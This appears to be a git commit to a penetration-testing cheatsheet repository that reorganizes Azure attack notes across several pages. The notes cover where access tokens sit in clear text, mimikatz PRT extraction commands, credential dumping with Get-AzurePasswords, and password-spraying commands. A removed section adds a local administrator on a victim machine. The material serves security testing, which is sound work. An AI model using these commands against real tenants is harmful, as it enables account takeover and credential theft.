From b8bec59c3c0e93c521475c9b29087a826d24f45c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 1 Dec 2023 14:57:00 +0100
Subject: [PATCH] Tokens Locations and References
---
 docs/README.md | 2 +-
 docs/cloud/azure/Cloud - Azure Pentest.md | 210 +--------------------
 docs/cloud/azure/azure-access-and-token.md | 23 ++-
 docs/cloud/azure/azure-ad-connect.md | 26 ++-
 docs/cloud/azure/azure-devices-users-sp.md | 22 ++-
 docs/cloud/azure/azure-enumeration.md | 31 +-
 docs/cloud/azure/azure-persistence.md | 7 +-
 docs/cloud/azure/azure-requirements.md | 3 +-
 docs/cloud/azure/azure-services.md | 52 ++++-
 9 files changed, 144 insertions(+), 232 deletions(-)
diff --git a/docs/README.md b/docs/README.md
index 0176c2e..c9add6a 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -1,4 +1,4 @@
-# InternalAllTheThings
+# πŸ“• InternalAllTheThings
 Active Directory and Internal Pentest Cheatsheets
diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md
index 27c1995..c60ee5b 100644
--- a/docs/cloud/azure/Cloud - Azure Pentest.md
+++ b/docs/cloud/azure/Cloud - Azure Pentest.md
@@ -1,25 +1,3 @@
-# Cloud - Azure
-
-## Summary
-
-* [Azure Recon Tools](#azure-recon-tools)
-* [Enumeration](#enumeration)
- * [Enumeration methodology](#enumeration-methodology)
-* [Token from Managed Identity](#token-from-managed-identity)
- * [Refresh Tokens](#refresh-token)
-* [Stealing Tokens](#stealing-tokens)
- * [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
- * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
-* [Pass The Certificate](#pass--the-certificate)
-* [Pass The PRT](#pass-the-prt)
-* [Deployment Template](#deployment-template)
-* [Application Proxy](#application-proxy)
-* [Azure AD](#azure-ad)
- * [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
- * [Convert GUID to SID](#convert-guid-to-sid)
-* [Azure AD Connect](#azure-ad-connect)
-* [References](#references)
-
 ## Azure Recon Tools
 * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
@@ -171,190 +149,4 @@ # Administrator $ Create-Backdoor, Execute-Backdoor ``` -* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API - -## Token from Managed Identity - -### Refresh Tokens - -* https://github.com/ConstantinT/Lantern - ```powershell - Lantern.exe cookie --derivedkey --context --prt - Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename --outpfxfile - Lantern.exe token --username --password - Lantern.exe token --refreshtoken - Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password ) - ``` -* https://github.com/rvrsh3ll/TokenTactics - ```powershell - Import-Module .\TokenTactics.psd1 - CommandType Name Version Source - ----------- ---- ------- ------ - Function Clear-Token 0.0.1 TokenTactics - Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics - Function Forge-UserAgent 0.0.1 TokenTactics - Function Get-AzureToken 0.0.1 TokenTactics - Function Get-TenantID 0.0.1 TokenTactics - Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics - Function Parse-JWTtoken 0.0.1 TokenTactics - Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics - Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics - Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics - Function RefreshTo-GraphToken 0.0.1 TokenTactics - Function RefreshTo-MAMToken 0.0.1 TokenTactics - Function RefreshTo-MSGraphToken 0.0.1 TokenTactics - Function RefreshTo-MSManageToken 0.0.1 TokenTactics - Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics - Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics - Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics - Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics - Function RefreshTo-OutlookToken 0.0.1 TokenTactics - Function RefreshTo-SubstrateToken 0.0.1 TokenTactics - ``` - -## Stealing Tokens - -* Get-AzurePasswords - ```powershell - Import-Module 
Microburst.psm1 - Get-AzurePasswords - Get-AzurePasswords -Verbose | Out-GridView - ``` - -### Stealing tokens from az cli - -* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\\.Azure` -* azureProfile.json in the same directory contains information about subscriptions. - -### Stealing tokens from az powershell - -* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\\.Azure` -* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json** -* Users can save tokens using `Save-AzContext` - - -## Pass The Certificate - -```ps1 -Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose -Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert - -# Require the PRT, TenantID, Context and DerivedKey -& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId --prt --userName @.onmicrosoft.com --hexCtx --hexDerivedKey -# PFX saved with the name @.onmicrosoft.com.pfx and password AzureADCert -``` - -Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine - -https://github.com/morRubin/AzureADJoinedMachinePTC - -```ps1 -Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP -Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10 - -python Main.py --usercert C:\Users\Username\Documents\username\@.onmicrosoft.com.pfx -- -certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add" -``` - - -## Deployment Template - -```powershell -PS Az> Get-AzResourceGroup -PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP - -# Export -PS Az> Save-AzResourceGroupDeploymentTemplate 
-ResourceGroupName -DeploymentName -cat .json # search for hardcoded password -cat | Select-String password -``` - -## Application Proxy - -```powershell -# Enumerate application that have Proxy -PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} -PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"} -PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1 -PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId -``` - -## Application Endpoint -```powershell -# Enumerate possible endpoints for applications starting/ending with PREFIX -PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls} -PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage -``` - - -## Azure AD - -With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD. - -1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/) -2. Change your browser URL to: https://azure.microsoft.com/ -3. Pick the account from the active sessions -4. Select Azure Active Directory and enjoy! 
- -### Azure AD vs Active Directory - -| Active Directory | Azure AD | -|---|---| -| LDAP | REST API'S | -| NTLM/Kerberos | OAuth/SAML/OpenID | -| Structured directory (OU tree) | Flat structure | -| GPO | No GPO's | -| Super fine-tuned access controls | Predefined roles | -| Domain/forest | Tenant | -| Trusts | Guests | - -* Password Hash Syncronization (PHS) - * Passwords from on-premise AD are sent to the cloud - * Use replication via a service account created by AD Connect -* Pass Through Authentication (PTA) - * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text -* Connect Windows Server AD to Azure AD using Federation Server (ADFS) - * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password - - -* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large -* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large -* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large -* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large - - -### Convert GUID to SID - -The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. 
- -```powershell -GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] -SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] -``` - -For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` - - -## References - -* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) -* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html) -* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) -* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/) -* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) -* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) -* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) -* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) -* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20) -* [Windows Azure Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE) -* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) -* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) -* [Azure AD connect for RedTeam - 
@xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) -* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) -* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) -* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) -* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) -* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric PalhiΓ¨re (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) -* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) -* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) -* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) \ No newline at end of file +* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API \ No newline at end of file diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 6a11137..60847fe 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md 
@@ -199,6 +199,20 @@ Decode access tokens: [jwt.ms](https://jwt.ms/) ``` +### Access Token Locations + +Tokens are stored by default on the disk in you use **Azure Cloud Shell**. They canbe extracted by dumping the content of the storage account. + +* az cli + * az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\\.Azure` + * azureProfile.json in the same directory contains information about subscriptions. + +* Az PowerShell + * Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\\.Azure` + * It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json** + * Users can save tokens using `Save-AzContext` + + ## Refresh Token * Requesting a token using credentials @@ -282,6 +296,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine mimikatz # sekurlsa::cloudap mimikatz # sekurlsa::dpapi mimikatz # dpapi::cloudapkd /keyvalue: /unprotect + mimikatz # dpapi::cloudapkd /context: /derivedkey: /Prt: ``` * Use either roadtx or AADInternals to generate a new PRT token ```ps1 
@@ -353,8 +368,14 @@ Use the user account to create a computer and request a PRT ## References +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema - April 16, 2020](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) * [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0) * [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program) * [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike) * [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94) -* [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert - AADInternals.com - September 01, 2020](https://aadinternals.com/post/prt/) \ No newline at end of file +* [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert - AADInternals.com - September 01, 2020](https://aadinternals.com/post/prt/) +* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html) +* [Attacking Azure Cloud shell - Karl Fosaaen - December 10, 2019](https://blog.netspi.com/attacking-azure-cloud-shell/) +* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) +* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) \ No newline at end of file 
diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md
index 5846b8b..ff9bfd7 100644
--- a/docs/cloud/azure/azure-ad-connect.md
+++ b/docs/cloud/azure/azure-ad-connect.md
@@ -1,10 +1,25 @@
 # Azure AD Connect
+| Active Directory | Azure AD |
+|-----------------------------------|-------------------|
+| LDAP | REST API'S |
+| NTLM/Kerberos | OAuth/SAML/OpenID |
+| Structured directory (OU tree) | Flat structure |
+| GPO | No GPO's |
+| Super fine-tuned access controls | Predefined roles |
+| Domain/forest | Tenant |
+| Trusts | Guests |
+
 Check if Azure AD Connect is installed : `Get-ADSyncConnector`
 * For **PHS**, we can extract the credentials
-* For **PTA**, we can install the agent
-* For **Federation**, we can extract the certificate from ADFS server using DA
+ * Passwords from on-premise AD are sent to the cloud
+ * Use replication via a service account created by AD Connect
+* For **PTA**, we can attack the agent
+ * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text
+* For **Federation**, connect Windows Server AD to Azure AD using Federation Server (ADFS)
+ * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password
+ * extract the certificate from ADFS server using DA
 ## Password Hash Synchronization
@@ -100,4 +115,9 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta ## References * [Introduction to Microsoft Entra Connect V2 - Microsoft](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-azure-ad-connect-v2) -* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg) \ No newline at end of file +* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg) +* [Impersonating Office 365 Users With Mimikatz - Michael Grafnetter - January 15, 2017](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +* [Azure AD Overview - John Savill's Technical Training - Oct 7, 2014](https://www.youtube.com/watch?v=l_pnNpdxj20) +* [Windows Azure Active Directory in plain English - Openness AtCEE - Jan 9, 2014](https://www.youtube.com/watch?v=IcSATObaQZE) +* [Azure AD connect for RedTeam - Adam Chester @xpnsec - 2019-02-18](https://blog.xpnsec.com/azuread-connect-for-redteam/) +* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) \ No newline at end of file diff --git a/docs/cloud/azure/azure-devices-users-sp.md b/docs/cloud/azure/azure-devices-users-sp.md index b141b05..2d02cf9 100644 --- a/docs/cloud/azure/azure-devices-users-sp.md +++ b/docs/cloud/azure/azure-devices-users-sp.md @@ -32,7 +32,6 @@ New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember ``` -### Use Credentials ### Dynamic Group Membership 
@@ -66,6 +65,17 @@ PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq " dsregcmd.exe /status Device Name : jumpvm ``` +* **Azure AD Joined** : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large +* **Workplace Joined** : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large +* **Hybrid Joined** : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large +* **Workplace joined on AADJ or Hybrid** : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large + ### Join Devices @@ -125,7 +140,7 @@ Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlock ``` -# Service Principals +## Service Principals ## Other @@ -141,3 +156,6 @@ roadtx findscope -s https://graph.microsoft.com/mail.read ## References * [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps) +* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) +* [AZURE AD INTRODUCTION FOR RED TEAMERS - Aymeric PalhiΓ¨re (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) \ No newline at end of file diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index fd8f581..0131259 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md @@ -32,7 +32,7 @@ ``` -### Enumerate Email +### Enumerate Emails > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. 
@@ -45,20 +45,28 @@ contact@.onmicrosoft.com - INVALID ``` * Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon + ```powershell + Install-Module MSOnline + Install-Module AzureAD + .\o365recon.ps1 -azure + ``` ### Password Spraying The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds. -```powershell -PS> git clone https://github.com/dafthack/MSOLSpray -PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 -PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Verbose -PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 -PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! -``` - +* [dafthack/MSOLSpray](https://github.com/dafthack/MSOLSpray) + ```powershell + PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 + PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Verbose + PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 + PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! + ``` +* [0xZDH/o365spray](https://github.com/0xZDH/o365spray) + ```powershell + o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com + ``` ## Azure Services Enumeration 
@@ -177,5 +185,6 @@ Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Reco ## References -* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/) -* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) \ No newline at end of file +* [Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020](https://o365blog.com/post/mdm/) +* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) +* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) \ No newline at end of file diff --git a/docs/cloud/azure/azure-persistence.md b/docs/cloud/azure/azure-persistence.md index efcb9b9..f177cac 100644 --- a/docs/cloud/azure/azure-persistence.md +++ b/docs/cloud/azure/azure-persistence.md @@ -13,4 +13,9 @@ PS > $password = ConvertTo-SecureString '' -AsPlainText -Force PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' - ``` \ No newline at end of file + ``` + + +## References + +* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) \ No newline at end of file diff --git a/docs/cloud/azure/azure-requirements.md b/docs/cloud/azure/azure-requirements.md index 2214600..3c59dda 100644 --- a/docs/cloud/azure/azure-requirements.md +++ b/docs/cloud/azure/azure-requirements.md 
@@ -25,4 +25,5 @@ ## References -* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest) \ No newline at end of file +* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest) +* [An introduction to penetration testing Azure - HollyGraceful - 06 August 2021](https://akimbocore.com/article/introduction-to-pentesting-azure/) \ No newline at end of file diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md index f63ca2f..a487d21 100644 --- a/docs/cloud/azure/azure-services.md +++ b/docs/cloud/azure/azure-services.md @@ -127,8 +127,15 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. PS Az> Get-AzKeyVaultSecret -VaultName -Name Reader -AsPlainText ``` +* Extract secrets from Automations, AppServices and KeyVaults + ```powershell + Import-Module Microburst.psm1 + PS Microburst> Get-AzurePasswords + PS Microburst> Get-AzurePasswords -Verbose | Out-GridView + ``` -## Azure Storage Blob + +## Storage Blob * Blobs - `*.blob.core.windows.net` * File Services - `*.file.core.windows.net` @@ -164,7 +171,7 @@ PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount :warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. -## Azure Web App +## Web Apps ### SSH Connection 
@@ -172,6 +179,43 @@ PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount az webapp create-remote-connection --subscription --resource-group -n ``` +## Application Endpoint + +* Enumerate possible endpoints for applications starting/ending with PREFIX + ```powershell + PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls} + PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage + ``` + + +## Application Proxy + +* Enumerate applications that have Proxy + ```powershell + PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} + PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"} + + PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1 + PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId + ``` + + +## Deployment Template + +* List the deployments + ```powershell + PS Az> Get-AzResourceGroup + PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP + ``` +* Export the deployment template + ```ps1 + PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName + + # search for hardcoded password + cat .json + cat | Select-String password + ``` + ## Azure Devops 
@@ -259,4 +303,6 @@ Get-MgDrive -top 1 * [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell) * [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview) -* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps) \ No newline at end of file +* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) \ No newline at end of file